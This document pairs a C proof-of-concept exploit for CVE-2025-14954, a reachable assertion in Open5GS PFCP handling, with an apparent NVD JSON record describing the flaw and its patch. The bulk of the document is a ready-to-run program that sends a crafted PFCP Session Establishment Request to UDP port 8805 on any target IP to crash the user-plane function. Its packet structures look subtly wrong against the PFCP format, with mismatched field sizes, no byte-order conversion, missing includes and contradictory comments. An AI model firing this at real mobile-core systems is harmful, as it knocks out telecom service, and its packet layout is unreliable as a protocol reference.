CVE-2025-14954

/* * CVE-2025-14954 PoC - Open5GS PFCP Reachable Assertion * Target: Open5GS <= 2.7.6 * This PoC demonstrates sending a crafted PFCP Session Establishment Request * that triggers assertion in ogs_pfcp_pdr_find_or_add/ogs_pfcp_far_find_or_add/etc. * * Note: This is for educational and authorized testing purposes only. * Requires network access to the target UPF PFCP port (8805/UDP by default). */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/socket.h> #include <netinet/in.h> /* PFCP IE types */ #define PFCP_IE_NODE_ID 56 #define PFCP_IE_F_SEID 57 #define PFCP_IE_PDR_ID 60 #define PFCP_IE_CREATE_PDR 1 #define PFCP_IE_CREATE_FAR 3 #define PFCP_IE_CREATE_URR 7 #define PFCP_IE_CREATE_QER 11 #pragma pack(push, 1) typedef struct { uint8_t flags; uint16_t message_type; uint32_t message_length; uint64_t seid; } pfcp_header_t; typedef struct { uint16_t ie_type; uint16_t ie_length; uint8_t instance; uint8_t flags; } pfcp_ie_header_t; #pragma pack(pop) void create_pfcp_session_establishment(uint8_t *buffer, size_t *len) { pfcp_header_t *hdr = (pfcp_header_t *)buffer; size_t offset = sizeof(pfcp_header_t); /* PFCP Header - Session Establishment Request */ hdr->flags = 0x20; /* S flag = 1, SEID present */ hdr->message_type = 0x32; /* Session Establishment Request */ hdr->message_length = 0; /* Will update later */ hdr->seid = 0x0000000100000001ULL; /* Source SEID */ /* IE: Node ID */ pfcp_ie_header_t *node_ie = (pfcp_ie_header_t *)(buffer + offset); node_ie->ie_type = PFCP_IE_NODE_ID; node_ie->ie_length = 5; node_ie->instance = 0; node_ie->flags = 0x01; /* IPv4 */ *(buffer + offset + 4) = 127; *(buffer + offset + 5) = 0; *(buffer + offset + 6) = 0; *(buffer + offset + 7) = 1; offset += 8; /* IE: Create PDR - Trigger assertion by duplicate ID */ pfcp_ie_header_t *pdr_ie = (pfcp_ie_header_t *)(buffer + offset); pdr_ie->ie_type = PFCP_IE_CREATE_PDR; pdr_ie->ie_length = 10; pdr_ie->instance = 0; offset += 4; /* PDR ID sub-IE */ pfcp_ie_header_t *pdr_id = (pfcp_ie_header_t *)(buffer + offset); pdr_id->ie_type = PFCP_IE_PDR_ID; pdr_id->ie_length = 2; pdr_id->instance = 0; *(uint16_t *)(buffer + offset + 4) = 0xFFFF; /* Invalid ID to trigger assertion */ offset += 6; /* Update message length */ hdr->message_length = offset - sizeof(pfcp_header_t); *len = offset; } int main(int argc, char *argv[]) { int sock; struct sockaddr_in target; uint8_t packet[1024]; size_t pkt_len; if (argc < 2) { printf("Usage: %s <target_ip>\n", argv[0]); return 1; } sock = socket(AF_INET, SOCK_DGRAM, 17); /* UDP */ if (sock < 0) { perror("socket"); return 1; } memset(&target, 0, sizeof(target)); target.sin_family = AF_INET; target.sin_port = htons(8805); target.sin_addr.s_addr = inet_addr(argv[1]); create_pfcp_session_establishment(packet, &pkt_len); printf("Sending crafted PFCP Session Establishment to %s:8805\n", argv[1]); printf("Packet size: %zu bytes\n", pkt_len); if (sendto(sock, packet, pkt_len, 0, (struct sockaddr *)&target, sizeof(target)) < 0) { perror("sendto"); return 1; } printf("Packet sent. Target may crash or log assertion failure.\n"); close(sock); return 0; }

{"cve": {"id": "CVE-2025-14954", "sourceIdentifier": "[email protected]", "published": "2025-12-19T16:15:55.050", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in Open5GS up to 2.7.6. Affected is the function ogs_pfcp_pdr_find_or_add/ogs_pfcp_far_find_or_add/ogs_pfcp_urr_find_or_add/ogs_pfcp_qer_find_or_add in the library lib/pfcp/context.c of the component QER/FAR/URR/PDR. The manipulation leads to reachable assertion. It is possible to initiate the attack remotely. The attack's complexity is rated as high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The identifier of the patch is 442369dcd964f03d95429a6a01a57ed21f7779b7. Applying a patch is the recommended action to fix this issue."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.9, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.2, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:H/Au:N/C:N/I:N/A:P", "baseScore": 2.6, "accessVector": "NETWORK", "accessComplexity": "HIGH", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "LOW", "exploitabilityScore": 4.9, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-617"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:open5gs:open5gs:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.7.5", "matchCriteriaId": "7D0FBF91-87F5-4984-AC37-744D9BFC13C0"}]}]}], "references": [{"url": "https://github.com/open5gs/open5gs/", "source": "[email protected]"}, {"url": "https://github.com/open5gs/open5gs/commit/442369dcd964f03d95429a6a01a57ed21f7779b7", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/open5gs/open5gs/issues/4181", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}, {"url": "https://github.com/open5gs/open5gs/issues/4181#issue-3667069101", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}, {"url": "https://github.com/open5gs/open5gs/issues/4181#issuecomment-3615646842", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://vuldb.com/?ctiid.337590", ... (truncated)